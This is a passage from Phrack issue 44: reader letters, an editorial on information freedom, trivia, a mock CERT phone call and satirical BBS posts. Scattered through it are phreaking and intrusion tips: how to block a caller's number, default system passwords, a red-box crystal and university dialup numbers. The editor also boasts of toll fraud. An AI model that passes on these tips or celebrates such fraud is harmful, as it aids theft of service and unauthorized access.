Italy. Maybe you two can take Italy by storm. Haha! Phrack's FTP site is ftp.netsys.com. All issues can be found there. also zero.cypher.com has a lot of files for ftp.] ------------------------------------------------------------------------------- Hi. I've been spending all my free time reading through phreaker files and all of the old Phracks. And, I was wondering if you are still there??? If so, I need your help! Here's the story: On August 3, 1993 I was indicted on charges that my company attempted to rip AT&T off of nearly $2MM in 1991. They say we started a 900# and went around the country calling it from Pay Telephones. They say that we went to a truck stop in Oregon and called the number 43,000+ times racking up an $800,000+ phone bill. They claim that computers were probably used, although I have seen no evidence of that. These pay telephones are those AT&T Black Phones; you know, the ones in the airports. They are owned by AT&T, built by AT&T, designed by AT&T, and even billed to AT&T. The evidence consists of nothing more than ANI reports. Some phone bills to back them up, but for the majority of it, they are using only ANI. Now, we all know that any can be blocked by having the operator get you a call. And it can be changed by dialing 0, having her get you 1-800-321-0288, then having the toll free call be made. In some areas, 900 calls slipped through that way, but it would be pretty hard to do 43,000 times. My point is, there are probably flaws with ANI. Someone who knows what they are doing may possibly be able to block or change ANI. Or maybe these calls were never put through. Maybe someone got into the CO, etc... What I need is someone who has knowledge of possible flaws with AT&T's theory. Enough that could give reasonable doubt and appear as an expert witness or point out where we could find someone. If you know of someone who might be able to help, please respond. My INTERNET ID is NOFRIENDS@AOL.COM or I have set up a FAX @ 1-800-572-4403. Remaining, NOFRIENDS [43000? Like a 43 and 3 zeros? Jesus. That's a lot of calls. I really don't understand how they can be charging you with something hey say was done from a payphone. Do they have pictures of you at the phone making the calls? Sounds like a load of crap and any lawyer should be able to get the charges dropped based on such flimsy evidence. As far as there being a problem with ANI, I don't think that's an issue. I've never heard of anything like this happening in the past, but there always could be a first time. Something is obviously amiss, but my gut reaction is that the Phone Company is lying about there being such records. Get a lawyer and demand the records be turned over during discovery. Then maybe you can see what you are up against. GET A LAWYER!@#] ------------------------------------------------------------------------------- Hi, I'd like to subscribe to Phrack and all upcoming issues (44+). Thanks. BTW, when is 44 scheduled for? Ciao, spirit-hex@prometheus.mtlnet.org PS: My board carries all PHRACK issues. I have around 4000 *quality* text files on my system. It's called operation prometheus at 514-735-4340. do you think you could post a small ad. for it in your magazine? We have FTP access/150 Usenet news/Internet accounts for members, ect.. (2 nodes at 14,400 baud). Thanks! [There you go!] ------------------------------------------------------------------------------- Hey, if you are having problems with people breaking the registration agreement as outlined in your last couple issues of Phrack. i may be able to help, and then I may not. My neighbor is a good friend, and fraud investigator. She is aware of my hobbies one of which involves Phrack. She thinks it is really neat what I am able to do with computers / modem. I am speaking somewhat candidly here but I am sure that you are smart enough to get my point. Well she handles some stuff like the David Koresh thing and helping the ATF/FBI with other cases. She likes the stuff that is too complicated for the FBI, all in all she does the investigating and puts it into words that the FBI, ATF, USDJ, SS, Dept of Treasury/IRS can understand, so they can make an arrest. All in all what i am trying to say is I may be able to pass the word on down the line to her about these people breaking the copyright law now effective on Phrack magazine. If you would like my help on this subject, just for the simple fact she loves to do this stuff, and phrack is a regularly read magazine by myself. If you would like maybe something can be done to these hypocrites that value laws, and get people arrested for the same stuff that they are currently doing by not registering Phrack. Just let me know if you want to try to push it. I will get together w/ her and see what can be done. Hopefully she will just ask for names and get an investigation started. Never can tell tho. L8r Sparky [I hope to God that I never have to go through the legal nightmare of trying to prove financial damages incurred by companies "pirating" phrack. It would be somewhat interesting to use some big company as an example, and embarrass everyone into submission, but I keep hoping that people will just be HONEST. Fuck, I may be a hacker, but I'm honest about it. "Chris, have you broken into other people's computers?" "Yes, yes I have." "Company, do your people read Phrack without registering your subscriptions?" "Uh, well, no, we used to read Phrack, uh, but we don't anymore." You all suck. You know who you are. How can you live with yourselves?] ------------------------------------------------------------------------------- If you don't already have the direct-dialup number for the student annex of the University of Adelaide for Phrack 44, here it is: +61-8-223-2657 there are eight 2400 baud modems, but at the moment one is dead. [Cool. International University Dialups! Our big US list is still being compiled, so everyone keep sending in your school's dialups. Its taking me forever to do this alone.] ------------------------------------------------------------------------------- Hi Chris.... Was thinking...seeing as you guys are in texas, how about an article on EDSNET ?? (There are dialups down here to it, via INFONET) [If EDSNET is what I think it is, didn't it used to be called Pac*It Plus? I had a scan of it a LOOOONG time ago when everyone used it to call altger and tchh. If anyone has a scan of it, or wants to do one, please send it to Phrack!] ------------------------------------------------------------------------------- So, what IS new in cyberspace? lyl libido [BILLY IDOL SPEAKS! OHMIGOD...HE TALKED TO ME! OH MY! I THINK I'M GONNA MESS UP MY PANTS! BILLY IDOL! OH GOD OH GOD OH GOD! O H M Y G O D ! ! Whew. Someone get the mop. What's new? Well, all kinds of people have jumped on the Express Lane of the Information Highway and have tried to make a new name for themselves by exploiting a concept they know nothing about purely as a marketing move. Gotta love it. Bob, I'll take Billy Idol in the Center Square to block...] ------------------------------------------------------------------------------- Thought you guys at Phrack might be interested in this small phile, if you don't already have it. It's simply a form letter to the FBI requesting all information they on file about you under the Freedom of Information Act and Privacy Act. They MUST respond, by law, or they face legal penalties. Traditionally what they do is ignore your request unless they think you have enough money to go to court (i.e, you work for the New York Times or something). Really enjoyed Phrack #43 (as usual) - keep up the good work! (file follows signature) ------------------------------------------------------------------------- Doug ----------------------------------------------------------------------- PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST Name Street Address City, State, Zip Date Federal Bureau of Investigation Records Management Division - FOIA/PA Office 9th & Pennsylvania Avenue NW Washington, DC 20535 Gentlemen: This is a request under the provisions of both the Privacy Act (5 USC 552b) and the Freedom of Information Act (5 USC 522). This request is being made under both Acts. I hereby request one copy of any and all records about me or referencing me maintained by the FBI. This includes (but should not be limited to) documents, reports, memoranda, letters, electronic files, database references, "do not file" files, photographs, audio tapes, videotapes, electronic or photographic surveillance, "june mail", mail covers, and other miscellaneous files, and index citations relating to me or referencing me in other files. My full name is: __________________________ My date of birth was:_______________________ My place of birth was:______________________ My social security number is:________________ I have lived in these places:__________________________________ _______________________________________________________________ Other names, places, events, organizations, or other references under which you may find applicable records:_________________________________________________________ _________________________________________________________________ As you know, FOIA/PA regulations provide that even if some requested material is properly exempt from mandatory disclosure, all segregable portions must be released. If the requested material is released with deletions, I ask that each deletion be marked to indicate the exemption(s) being claimed to authorize each particular withholding. In addition, I ask that your agency exercise its discretion to release any records which may be technically exempt, but where withholding serves no important public interest. I hereby agree to pay reasonable costs associated with this request up to a maximum of $25 without my additional approval. However, I strongly request a fee waiver because this is, in part, a Privacy Act request. This letter and my signature have been certified by a notary public as marked below. Sincerely, _______________________________ requester's signature ______________________________ ___________________________ requester's printed name notary stamp and signature [Anyone who thinks they might be suspected of something might want to fill this out. Its not a bad idea. If YOU DON'T think you are under some kind of investigation, you probably shouldn't. No reason to give them any leads.] ------------------------------------------------------------------------------- "We at Phrack welcome constructive criticism, but at least have the nerve to email directly, rather than hide behind an anonymous remailer. That way, someone could have responded to you in a more direct and expeditious manner." While I agree with your general analysis of the intelligence of that reader, I have to take exception to your disparaging of the anonymous service. The anonymous service takes flak from many people constantly, but usually it is from reactionary establishment types, and it's not what I expect from phrack. Anonymous communications have many purposes other than the sender lacking "nerve". The "the only reason to use anon mail is because you are a coward and can't stand up for what you say" argument sounds remarkably similar to the "the only reason to use cryptography is because you are a criminal and have something to hide" argument. No doubt many criminals use cryptography and no doubt many spineless cowards use anon mail, but to disparage someone for using anon mail is similar to disparaging someone for using cryptography: even if it is in this case accurate, it spreads the misconception that there are only "dishonest" reasons to use these things. As someone with great respect for privacy that allows me to see the legitimate (and necessary to a free and democratic society) use of both secure and private communications, and anonymous communications, I know that this is not the case. I will not list legitimate uses of anonymous mail for you, because they are much the arguments for cryptography, and no doubt you know all of these. But a possibility is that the person involved would have his job/professional connections threatened if some people knew that he read Phrack and sympathized with it. Just a possibility, but if it is not true in this case it is surely easy to believe it is true in others. Sure, for those of us who can easily get a million email accounts from various places in any pseudonym we want, anonymous mail is unnecessary. But a legitimate and secure (and respected) way to send the occasional anonymous message is much preferable to (possibly illegal) deception and fraud. So, in short, even though the reader in question may indeed have been a spineless coward (not to mention whining nitwit), to insult him for his use of the anonymous server is harmful to the cause of anonymous mail, a cause which has few supporters and many disparagers, and a cause which the operators of the anonymous server in Finland should be commended for. Secure anonymous mail (which really doesn't quite exist yet, actually), like secure encryption, is something necessary and good for a free society and, and should not be disparaged. [Yes, you are 100% right. I really didn't mean to dis the anonymous mail service as a whole, I just wanted to rag on the butthead who sent me an anonymous piece of hate-mail. I personally don't use, nor have a need to use, the anonymous mailers, but I know a lot of people do. They DO provide a much needed service to a lot of people, and you are right they should be commended on a job well done. However, if someone wants to send me some kind of shitty piece of mail, get a pair of balls and show yourself. If you are so unsure of your comments that you need to hide, then your point must not be very valid.] ------------------------------------------------------------------------------- "Jurassic Punk" T-shirts are now available from your phriends at CYBERPUNK SYSTEM. These 100% cotton shirts are black, with artwork on the front with the words "A subculture 5,120 years in the making." Underneath the letter are bitstreams "11010001011101". On the back, in white is "Attitude is everything." Allegedly similar in design to the Jurassic Park logo. Shirt $15 ea Cap $15 ea Color Decals $1 ea Please include $3 per item for shipping and handling, $5 if overseas. Allow 3-4 weeks for delivery. CYBERPUNK SYSTEM P.O. Box 771072 Wichita, KS 67277-1072 Legacy@cpu.cyberpnk1.sai.com ****** STILL AVAILABLE ****** On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain Picard of Holodeck, had finally had enough of AT&T. Together, they traveled to the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed the property in the name of Pirates and Hackers everywhere. They hoisted the Jolly Roger skull and crossbones high on the AT&T flagpole, where it stayed for 2 days until it was taken down by security. This event was photographed and videotaped by dGATOBAS Productions, to preserve this landmark in history. And now you can witness the event. For a limited time we are offering a 11" x 17" full color poster of the Jolly Roger Pirate flag flying high over AT&T, with the AT&T logo in plain view, with the caption; "WE CAME, WE SAW, WE CONQUERED." Also available, by request is a 20" x 30" full color poster, and a cotton T-shirt with the same full color picture on the front. Prices: 11" x 17" Full Color poster...........................$10 US 20" x 30" Full Color photograph.......................$20 US T-Shirt with picture on front.........................$20 US If you are interested in purchasing any of the above items, simply send check or money order for the amount, plus $3 US per item for postage and handling to: CYBERPUNK SYSTEM P.O. Box 771072 Wichita, KS 67277-1072 Be sure to specify size on T-shirt. A GIF of this is also available from CyberPunk System, 1:291/19 (FidoNet), 47:617/0 (VUARNet), 93:3316/0 (PlatinumNet), 69:2316/0 (CCi). FREQ magicname PIRATE. Also available uuencoded, send mail to Legacy@cpu.cyberpnk1.sai.com [God bless the free enterprise system! God bless capitalism! God bless America!] ------------------------------------------------------------------------------- I am unhappy to say that UPi now has dropped writing the magazine from this point on. The reason is because Arch Bishop and myself do not have the time to get everyone to write their articles, sort the magazine out, etc, etc. This does not mean the group is dead, that is not true. The group is still alive, but all future releases will be sent to Phrack for publication but under the UPI name. If you want to get a list of all the current sites and members of UPI you can finger my internet account to get the list. If you want any of the phone number(s) for the sites, or you have any questions or anything else to say you can drop us a line. Anyways I guess that's it for now. ttyl The Lost Avenger/UPI Internet: mstone@nyx.cs.du.edu Voice Mailbox: 416-505-8636 [Phrack appreciates this offer to donate your files to us! We're sorry to hear that your mag won't be continuing, but I know what a pain in the ass it is to put out a magazine. It SUCKS! It's a time consuming thankless task. But what the hell, I'm stupid, and I have NO LIFE! Hehe.] *************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Four, File 2a of 27 Editorial **************************************************************************** This is going to piss people off, but hell, that's the point of having an editorial, eh? This issue I'd like to address something running rampant in our community: HYPOCRACY. I never really paid much attention to it, until the "Hacking At The End Of The Universe" conference in Amsterdam. The phrase "Information Wants to be Free," almost cliche by now, was heard screaming from nearly every speaker's mouth. It underlie in the tone of the whole proceedings. Everyone was either bitching about how this should be free, or that should be available, or it shouldn't be illegal to do some particular act, or they were fervently offering their support of these ideals. Granted, Holland has a notoriously permissive and open society; and indeed, Europe in general is far more laid back than the States, but even many in the US hold these ideals close to heart. One of the first things that pissed me off was the hundred guilder entrance fee. That's fifty dollars! Just to get in. On top of that one had to pay for a tent, sleeping bag, mattress and food. I have no problems with paying a fee, but this was Hack-Tic charging. One of the biggest proponents of "Information Wants to be Free!" Obviously YOUR information wants to be free, but theirs costs a hundred guilders. Even more shocking was the fact that nearly every session involving some kind of "technology" was geared around a Hack-Tic product: the Demon Dialer (tm), their POCSAG demodulator, their forthcoming spread spectrum lan adapter, or the magazine itself. Were these free? Were the information behind their design provided so would-be technoweenies could run right home and break out the soldering iron? Fuck no. Again, Hack-Tic's information is valuable, and YOU must PAY for the luxury of viewing it. Unlike XYZ Corporation's information, whose R & D or Financials (which might bring someone a hefty "finder's fee") so desperately wants to be free of its magnetic bonds and spread all the way to YOUR hard drive. I don't want to rag on Hack-Tic too much. I mean, throwing a conference costs a shitload of money, and I have a GREAT deal of respect for them for actually pulling off something so monumental. I just want to put things in perspective. The major cons in America (HoHo, Scon) really don't charge. They "ask" for donations. Sure, you might get a nasty look if you don't cough up five or ten bucks, but hell, everyone does. They WANT to. A good time is worth a handfull of change. And there isn't some awesome requirement just to get in the damn door. Besides, losses can always be made up by selling a plethora of crap such as t-shirts and videos, which everyone always wants to buy. (Hardware costs. :) ) Shifting back to America: 2600. Again, "Information Wants to be Free!" E. Goldstein, huge proponent of the slogan. Uh, do you pay five bucks an issue? I do. So, 2600's information isn't quite so eager to be free either, I guess. But, again, it does cost money to print a magazine like that, like it does to throw a conference, so certainly everyone can understand people trying to recap one's losses in a worthwhile project, right? Enter LOD Communications BBS Archive Project. The community went apeshit when thirty nine dollars was asked for the entire results of the project. LOD? Asking for MONEY? FOR INFORMATION??? INFORMATION WANTS TO BE FREE!!!#!@$ That's disgusting! But wait, I thought charging a little bit to try to recap losses (equipment, phone calls, disks, postage, TIME) was ok? "Oh sure it is dude, just not for you." Oh how silly of me. Of course! Thanks for setting me straight on that issue. Then there was Phrack. Always free to the community. Always available for everyone's enjoyment. Asking only that Corporate types pay a registration fee of a hundred dollars just to keep them honest. (They aren't.) Knowing full well that they are stealing it, sometimes quite brazenly. Resting quietly, knowing that they are just as unethical as they ever claimed us to be. We make no bones about money here. Our information is just as valuable as anyone's (probably more so) and is vastly more voluminous. Hell, Issue 43 was probably bigger than every Hack-Tic and almost every 2600 combined. And, wait a minute, could it be? Free? Oh my god! So it is. Free in both cost and access. Let me tell you something. Information does not want to be free, my friends. Free neither from its restraints nor in terms of dollar value. Information is a commodity like anything else. More valuable than the rarest element, it BEGS to be hoarded and priced. Anyone who gives something away for nothing is a moron. (I am indeed stupid.) I can't fault anyone for charging as long as they don't try to rationalize their reasoning behind a facade of excuses, all the while shouting "Information Wants to be Free!" Trade secrets don't want to be free, marketing projections don't want to be free, formulas don't want to be free, troop placements don't want to be free, CAD designs do not want to be free, corporate financial information doesn't want to be free, my credit report sure as hell doesn't want to be free! Let's take a step back: how to use a system IS information that should be proliferated, how computers network IS information that should be spread, new technologies WANT to be explained, holes ought to be pointed out, bug patches NEED to be free...note the difference? I'll end my rant with another piece of flawed logic. At HEU a debate raged on about why phone calls should be free. Hey, I love a toll-fraud device as much as the next guy (blue box tones still make me cry), and I've used more codes in my life than a million warez couriers and I make no bones about it...I fucking stole service! Yippee! Arrest me! The argument stated "The lines are already there, so why should I have to pay to use an unused line?" Ok, fine, you don't...but you DO have to pay for laying fiber, designing switch generic upgrades, ATM research, compression and filtering algorithm design, video dial tone, daily maintenance, directory assistance, operator service or any of the hundreds of other things your old fee would go towards. Don't like that argument? Fine, the tents at HEU were already there and the seats had been layed out and were unused...get me my hundred guilders refunded. ----------------------------------------------------------------------------- Once upon a time a Pig, a Cat, a Dog, and a Little Red Hen lived together in a little house. The Pig, the Cat, and the Dog were all very lazy. The Little Red Hen had to do everything around the house by herself. All the Pig, the Cat, and the Dog wanted to do was play. One day, as the Little Red Hen was raking in the yard, she found some seeds. "Who will help me plant these grains of wheat?" she asked. "Not I," said the Pig. "Not I," said the Cat. "Not I," said the Dog. "Then I will do it myself," said the Little Red Hen. And she did. Soon the wheat grew tall and golden. "Who will help me cut the wheat?" asked the Little Red Hen. "Not I," said the Pig. "Not I," said the Cat. "Not I," said the Dog. "Then I will do it myself," said the Little Red Hen. And she did. When the grain was cut and ready to be ground into flour, the Little Red Hen asked, "Who will help me take the grain to the mill?" "Not I," said the Pig. "Not I," said the Cat. "Not I," said the Dog. "Then I will do it myself," said the Little Red Hen. And she did. When the flour came back from the mill, the Little Red Hen asked, "Who will help me bake the bread?" "Not I," said the Pig. "Not I," said the Cat. "Not I," said the Dog. "Then I will do it myself," said the Little Red Hen. And she did. She made the flour into dough, and rolled the dough, and put it in the oven. When the bread was baked, she took it out of the oven. Mmmmmmmmmm! Didn't it smell good! "Who will help me eat this bread?" asked the Little Red Hen. "I will," said the Pig. "I will," said the Cat. "I will," said the Dog. "Oh, no, you won't!" said the Little Red Hen. "I found the seeds. I planted them. I harvested the grain and took it to the mill. I made the flour into bread. I did the work by myself, and now I am going to eat the bread--all by myself." And she did. Think back to your childhood...didn't we learn ANYTHING? ==Phrack Magazine== Volume Four, Issue Forty-Four, File 3 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ****************************************************************************** PHRACK TRIVIA Last issue I tried something different. I tried to have a little trivia contest, giving away some prizes for the first to get all the answers. Well, I should have known that Phrack's readers are lazy. The amount of you who actually responded was pathetic. The winners are: dFx, Holistic, Damiano & Matt I had planned on 5 winners. Notice how many won. I won't even say how many these guys got right, because noone came close to 100%. Obviously I'm the only trivia buff in the underground. ------------------------------------------------------------------------------- PHRACK TRIVIA ANSWERS 1) CCIS Common Channel Interoffice Signalling 2) Stimpson J. Cat's Roommate is? Ren Hoek 3) Name the cracker. Bill Landreth 4) METAL AE password. KILL 5) Who invented the TeleTrial? King Blotto 6) Name Bloom County's hacker. Oliver Wendell Jones 7) What was the Whiz Kids' computer named? RALF 8) Western Union owned what long distance service? MetroPhone 9) What computer read both Apple ][ and IBM PC disks? The Franklin ACE 10) Who made the "Charlie" board? John Draper 11) How many credits for a CNE? 19 12) What was in the trunk of the Chevy Malibu? Dead Aliens 13) Name three bands A. Jourgensen had a hand in. Ministry, Revolting Cocks, Skatenigs, Pailhead, Lard, (etc.) 14) SYSTEST Password: UETP 15) What computer makes the best Sim Stim decks? Ono-Sendai 16) What magazine brought the telephone underground to national attention in 1971? Esquire 17) What is the significance of 1100 + 1700 hz? KP 18) What magazine was raided for publishing black box plans? Ramparts 19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ? The Private Sector 20) CLASS Custom Local Area Signalling Services 21) What computer responds "OSL, Please" ? NT SL-1 22) RACF secures what OS? MVS 23) The first person to create a glider gun got what? $50.00 24) QRM Interference from another station or man-made source 25) PSS Packet Switch Stream 26) What PSN was acquired by GTE Telenet? UniNet 27) 914-725-4060 OSUNY 28) April 15, 1943 Discovery of LSD 29) 8LGM 8-legged Grove Machine 30) WOPR War Operations Planned Response 31) What happened on March 1, 1990? Steve Jackson Games Raided By Secret Service 32) Port 79 Finger 33) Who starred in the namesake of Neil Gorsuch's UNIX security mailing list? Sean Connery 34) What Dutch scientist did research in RF? Van Eck 35) What was the author of GURPS Cyberpunk better known as? The Mentor 36) Who would "Piss on a spark plug if he thought it would do any good?" General Berringer 37) What thinktank did Nickie Halflinger escape from? Tarnover 38) NCSC National Computer Security Center 39) Who is Pengo's favorite astronomer? Cliff Stoll 40) What language was Mitnik's favorite OS written in? BLISS 41) Abdul Alhazred wrote what? The Necronomicon 42) The answer to it all is? 42 43) Who is the father of computer security? Donn B. Parker 44) Who wrote VCL? Nowhere Man 45) What kind of computer did Cosmo have? A Cray 46) Hetfield, Ulrich, Hammet, Newstead Metallica 47) What company wrote the computer game "Hacker?" Activision 48) Who does Tim Foley work for? US Secret Service 49) Who played Agent Cooper? Kyle MacLachlan 50) Vines runs over what OS? AT&T Sys V. UNIX 51) Mr. Peabody built what? The Way-back Machine 52) Who makes SecurID? Security Dynamics 53) What's in a Mexican Flag? White Tequila, Green Creme de Menthe & Grenadine, layered 54) Who created Interzone? William S. Burroughs 55) JAMs (as led by John Dillinger) Justified Ancients of MU 56) Abbie Hoffman helped start what phreak magazine? YIPL 57) What was once "Reality Hackers?" Mondo 2000 58) Gates and Allen "wrote" BASIC for what computer? The Altair 59) Tahoe is related to what OS? BSD Unix 60) CPE 1704 TKS is what? Launch Code from Wargames 61) Telemail's default was what? A 62) "Do Androids Dream of Electric Sheep" became what? Blade Runner 63) What broadcasts between roughly 40 and 50 mhz? Cordless Phones 64) Who created Tangram, Stratosphere, and Phaedra among others? Tangerine Dream 65) What was Flynn's most popular video game? Space Paranoids 66) Who lived in Goose Island, Oregon? Dr. Steven Falken 67) 516-935-2481 Plovernet 68) What is the security of ComSecMilNavPac? 9 69) What has the "spiral death trap?" Qix 70) Who was the Midnight Skulker? Mark Bernay 71) TMRC Tech Model Railroad Club 72) Who wrote "Jawbreaker?" John Harris 73) 213-080-1050 Alliance Teleconferencing, Los Angeles 74) What is the Tetragrammaton represented as? YHVH (or IHVH) 75) Who is Francis J. Haynes? Frank (of the Phunny Phone Call fame) 76) Who ran into one of the Akira test subjects? Tetsuo Shima 77) What had "Munchies, Fireballs and Yllabian Space Guppies?" Stargate 78) PARC Palo Alto Research Center 79) Alex and his droogs hung out where? The Korova Milk Bar 80) Jane Chandler in DC's "Hacker Files" is based on who? Gail Thackeray 81) The Artificial Kid lives on what planet? Reverie 82) 208057040540 QSD 83) What are the two most common processors for cellular phones? 8051 & 68HC11 84) Who came up with the term "ICE?" Tom Maddox 85) What group is hoped might help the "Angels" contact RMS? The Legion of Doom 86) Who is Akbar's friend? Jeff 87) What company's games was David Lightman after? Protovision 88) 26.0.0.0 NET-MILNET 89) Who was Mr. Slippery forced to locate? The Mailman 90) Who is "The Whistler?" Joe Engressia 91) What use would a 6.5536 crystal be? Making a red box 92) .--. .... .-. .- -.-. -.- PHRACK 93) The Dark Avenger likes what group? Iron Maiden 94) What book spawned the term "worm?" The Shockwave Rider 95) Michael in "Prime Risk" wanted money for what? Flying Lessons 96) Automan's programmer worked for who? The Police Department 97) What signal filled in keystrokes on TOPS-20? ESC 98) ITS Incompatible Time-sharing System 99) (a/c)+121 Inward Operator 100) What drug kept the scanners sane? Ephemerol Bonus 1 3 pts Name three bodies of work by Andrew Blake? Night Trips Night Trips 2 Hidden Obsessions Secrets (etc.) Bonus 2 3 pts Name three currently available titles with Norma Kuzma. Fast Food Not of This Earth Cry Baby Laser Moon (etc.) Bonus 3 4 pts Why would I hate Angel Broadhurst? Because he was living with Christina Applegate. (Duh) ******************************************************************************* ** PHRACK MAGAZINE NEEDS THE FOLLOWING ** Any Storage Device Capable of Writing ISO-9660 Format + Software (IE: Personal ROM-Writer, Pinnacle Optical Drive, MicroBoard) A Flatbed 24-Bit Color Scanner SCSI Hard Drives 486 or Pentium Processors SGI Indy/Indigo/Crimson/Iris/Challenge II/Onyx (Any would do) Spectrum Analysis Equipment Oscilloscopes Horizontal & Vertical Sync Adjustment Equipment Miscellaneous Ham Radio Equipment Any donations will be generously rewarded with k-rad info and huge amounts of good karma. ** PHRACK MAGAZINE DOESN'T REALLY NEED BUT KINDA WOULD LIKE THE FOLLOWING ** The Drew Barrymore Home Video (The Motel One) The Christina Applegate "Home Video" (The Poker One) Xuxa's "Early" Films Howard Stern's "Banned by the FCC" CD Jennie Garth's Workout Tape The European Smut Mag with Alissa Milano in it. ******************************************************************************* [Something very humorous I found on the FireWalls List] A one-act play Dramatis Personae: Perry Metzger (PM): an AVP responsible for the firewall at a Fortune 100 company. Joe Cert (JC): A person at CERT supposed to be helping. [The scene opens to Perry on the phone with Joe Cert. Perry is at work and freaking out because he doesn't run Sun sendmail and doesn't know what to do. If he turns off mail, his users will kill him. He has no idea how many machines he has to fix or if he has a problem at all.] PM: Well, I have the problem that I don't normally run Sun sendmail, and I can't run it, so I need to know enough that I can figure out how to fix my security problem. JC: Well, we don't have a procedure to tell people anything beyond what we put in the advisory. PM: I run the gateway for a firm that trades hundreds of billions of dollars a day in the financial markets. We can't afford do get shut down. Isn't there any way you can tell me anything that can help me? JC: Well, we really don't have a procedure in place. PM: I see. Can I ask you some questions? JC: Sure. PM: So this problem, would it be fixed if I had the Prog mailer turned off on my machines? JC: Well, its a problem that will allow people to run programs on your machine. PM: Yes, but would turning off the Prog mailer fix it? JC: Well, the problem allows people to run programs on your machine. PM: I see. Will this problem only hurt machines that have direct TCP access to the internet, or are machines that can get mail indirectly also possibly affected? JC: The hole is exploited by sending mail to the machine. PM: Yes, but do you need SMTP access to the machine, or will just being able to send mail to it hurt you? JC: Well, the hole is exploited by sending mail to the machine. PM: look, the machine on my firewall can't be telneted to. Does that make me safe? JC: Well, the hole is exploited by sending mail to the machine. PM: Listen, I have THREE THOUSAND workstations in a dozen cities on three continents. Are you telling me that I have to tell all my people that they are working the weekend installing a new sendmail on every machine in the firm? I don't even know how to test to see if I've fixed the problem once I've done that! JC: Well, the whole is exploited by sending mail to the machine. PM: Can't you tell me any details? JC: We really don't have a procedure for that. PM: Do you know what the problem is? JC: I can reproduce it, yes. PM: Look, I work for a company with REAL MONEY on the line here. I can get you a letter from a managing director telling you that I'm legit. You can check who we are in any newspaper -- we're one of the largest investment banks in the world. Every day the Wall Street Journal lists the Lehman Brothers T-Bond Index on page C-1. You can check my criminal record -- hell, the SEC makes you get fingerprinted so many times around here that I've still got ink on my fingers from the last time. Can't you give me some help here? JC: We really don't have a procedure for doing that. I'm taking notes, though, and I'll tell my management of your concerns. [He continues in this vein, but eventually, our hero gives up, realizing that CERT is part of the problem, not the solution. All they've succeeded in doing is keeping him up at night. He can't fix his problem, since he doesn't know how. He has no idea if he has a problem. He can't check once he's done something to determine if he's fixed it. All he knows is that CERT has no procedure for telling him anything regardless of who he is, period.] PM: So what you are telling me is that if I want details I have to subscribe to 2600 Magazine? JC: We don't have a procedure for giving you more information, no. PM: I'm sure the crackers will be happy to hear that. They are likely telling each other at a nice high speed. ******************************************************************************* IF SECURITY TYPES WERE K-RAD PART II SecurNet BBS Captures (From the LODCOM BBS Archive Project) ------------------------------------------------------------------------------ Number :) 214 From :) Uncertain Future Subject :) Get a life Hey All, Everyone out there who keeps calling up the Hotline begging for BUGS can just get a life. If you have to ask, you don't deserve to know. UnCERTian Future [A]uto reply [N] [R]e-read [Q]uit:N Number :) 215 From :) Spaf Master Subject :) ... Rum0r haz 1t that a p13cE 0f sH1t hAqu3r Nam3d Sk0tt ChaZ1n iz 0n Th3 F1RST l1zt!*&@$ 3yE hAv3 Try3D 2 g3t h1m Rem0v3D ButT n0-1 0N th3 l1sT w1lL d3w 1t!! Y Kan'T w3 d0 s0meth1ng aB0uT tHeze pr1ckz? 1 r3MeMb3r a dAy Wh3n 1t 0nLy t0oK a PhAx thR3at3n1nG 2 3nD mY sUpP0rT w0ulD g3t a CumSek Haqu3r lyK3 ChaZ1n R3m0v3D!@!# Sh1T! --spaf Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 216 From :) Zen Subject :) Who died and left you in charge? You suck Jeanie. Who said YOU got to be the master? Your group sucks too. You have obsolete info. You guys say "There is nothing you have that we can not possess?" Well, there is nothing you have that WE want to possess. I think I will begin shooting off my mouth at Usenix Security BOFs and in Risks and in mailing lists, then maybe I can be as ELEET as you. NOT! Zen Legion of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 217 From :) Hackman Subject :) I Dream of Geneie Yo Yo Yo... I think someone wants to be the next Donn Parker. Similarities: 1) Has BIG mouth 2) Writes Worthless Books 3) Hoardes inpho from invisible enemy 4) Goes on and on about "Evil Crackers" You should start charging 5000+ dollar speaking fees and shave your head. THEN, maybe someone will hire your worthless self, and you can emerge from Academia into the REAL world. Nah...you are too LAME! HACKMAN Legion of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 218 From :) American Eagle Subject :) hey. You two punks think you are so kool, don't you? I was developing security theory when you were in junior high. You need to get your asses kicked, and I'm the guy to do it. About my speaking fees...Youre jealous. See green often? You wish your k-rad companies (pffft) would pay you as well. BAH. AE /q . \s end/ stop , [A]uto reply [N] [R]e-read [Q]uit:N Number :) 219 From :) Captian VAX Subject :) New BBS Hello, I am putting up a new bbs to be a forum for a database on bugs and security problems. If you are interested, please send me email on here or on internet. Thx CV [A]uto reply [N] [R]e-read [Q]uit:N Number :) 220 From :) The BeanCounter Subject :) STUPH HEY...I AM NOT SURE BUT I THINK MY ACCOUNT AT DOCKMASTER HAS BEEN HACKED OUT. IF ANY1 KNOWS WHO DID IT LET ME KNOW. I AM REALLY PISSED! THATS WHAT HAPPENS WHEN PEOPLE GET SLOPPY AND THEY LET ON JUST ANYONE WHO CAN FILL OUT THE FORM! CAN WE LIE DOWN WITH DOGS AND EXPECT NOT TO GET UP WITH FLEAS? WHM [A]uto reply [N] [R]e-read [Q]uit:N Number :) 221 From :) Spaf Master Subject :) fUq U alL 33t sh1T u Pr1Kz!#!$@ 3yE m M0r3 3l33t thAn alL 0f u!!! U w1lL All F3el mY wRatH! Ey3 Hav3 ur InPh0!@$@ 1 w1Ll b3 kaLl1nG 3aCh 0f U v3Ry so()n. --spaf Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 222 From :) Venom Subject :) Fuck! Now I'm mad. That bastard Chasin posted the Sendmail Bug on The firewalls list! Now all the hackers will have it! I'm going to take him down. Anyone who wants to help, his site is crimelab.com. You can check the Forum's Codeline for further developments. Get your scripts ready! Let's hack the little prick! Venom [A]uto reply [N] [R]e-read [Q]uit:N Number :) 223 From :) American Eagle Subject :) Sendmail What is the sendmail bug? AE [A]uto reply [N] [R]e-read [Q]uit:N Number :) 224 From :) Uncertian Future Subject :) Sendmail The 